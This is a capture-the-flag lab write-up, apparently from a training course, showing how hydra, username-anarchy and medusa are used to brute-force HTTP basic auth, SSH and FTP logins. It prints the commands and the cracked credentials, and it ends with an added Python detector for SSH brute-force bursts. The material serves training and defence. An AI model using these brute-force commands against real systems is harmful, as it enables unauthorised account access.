Skill Assessment
Part 1
Task
The first part of the skills assessment will require you to brute-force the target instance. Successfully finding the correct login will provide you with the username you will need to start Skills Assessment Part 2.
You might find the following wordlists helpful in this engagement: usernames.txt and passwords.txt
What is the password for the basic auth login? After successfully brute forcing the login, what is the username you have been given for the next part of the skills assessment?
Attempt
From the task description I know it uses basic auth, so I started attacking that with hydra:
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt 94.237.60.18 http-get / -s 44686
You don’t need to specify any parameter if the page uses basic auth.
I got the credentials in a second:
[44686][http-get] host: 94.237.60.18 login: admin password: Admin123
Accessed the page with the credentials and got the username for part 2: satwossh.
Part 2
Task
This is the second part of the skills assessment. YOU NEED TO COMPLETE THE FIRST PART BEFORE STARTING THIS. Use the username you were given when you completed part 1 of the skills assessment to brute force the login on the target instance.
What is the username of the ftp user you find via brute-forcing? What is the flag contained within flag.txt?
Attempt
SSH brute force:
hydra -l satwossh -P /usr/share/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt ssh://94.237.60.18:57621
Got credentials: login: satwossh password: password1
Now ssh into the target:
ssh satwossh@94.237.60.18 -p57621
Found good files and a convenient tool:
ls
IncidentReport.txt passwords.txt username-anarchy
Got hints from the report:
Upon reviewing recent FTP activity, we have identified suspicious behavior linked to a specific user. The user **Thomas Smith** has been regularly uploading files to the server during unusual hours and has bypassed multiple security protocols. This activity requires immediate investigation.
All logs point towards Thomas Smith being the FTP user responsible for recent questionable transfers. We advise closely monitoring this user’s actions and reviewing any files uploaded to the FTP server.
I used username-anarchy with Thomas Smith:
./username-anarchy/username-anarchy Thomas Smith > thomas_smith_usernames.txt
Finally, happy attack time:
medusa -h 127.0.0.1 -U thomas_smith_usernames.txt -P passwords.txt -M ftp -t 5 | grep SUCCESS
Got the credentials thomas:chocolate!
FTP login:
ftp ftp://thomas@localhost
Now find the flag:
ls
get flag.txt
!cat flag.txt
Got the flag.
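Seen from the defender's side, the hydra run against SSH in Part 2 leaves a burst of "Failed password" entries from one source followed by an "Accepted password" entry. The following is an added example, not part of the original write-up: a small detector for that pattern, run over constructed sshd log lines. The ISO 8601 timestamp format, the host name, the IP addresses and the threshold values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (documentation IP ranges): eight guesses in eight
# seconds followed by a hit, plus an ordinary user who mistypes once.
SAMPLE_LOG = "\n".join(
    [f"2024-05-01T10:00:{s:02d} srv sshd[900]: Failed password for satwossh "
     f"from 203.0.113.7 port {40000 + s} ssh2" for s in range(1, 9)]
    + ["2024-05-01T10:00:09 srv sshd[900]: Accepted password for satwossh "
       "from 203.0.113.7 port 40009 ssh2",
       "2024-05-01T10:05:00 srv sshd[901]: Failed password for alice "
       "from 198.51.100.20 port 51000 ssh2",
       "2024-05-01T10:05:20 srv sshd[901]: Accepted password for alice "
       "from 198.51.100.20 port 51001 ssh2"])

LINE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failed logins inside the window.

    A flagged source that later logs in successfully is marked 'compromised':
    the guessing run found a valid password and the account needs a reset.
    """
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts = {}                     # ip -> alert record
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                # not an sshd password event
        ts = datetime.fromisoformat(m["ts"])
        ip, recent = m["ip"], failures[m["ip"]]
        while recent and ts - recent[0] > window:
            recent.popleft()        # drop failures that fell out of the window
        if m["result"] == "Failed":
            recent.append(ts)
            if len(recent) >= threshold:
                alerts.setdefault(ip, {"ip": ip, "status": "bruteforce", "user": None})
        elif ip in alerts:          # success from an already flagged source
            alerts[ip].update(status="compromised", user=m["user"])
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The same counting logic applies to the FTP and basic-auth stages if the regular expression is adapted to those services' log formats.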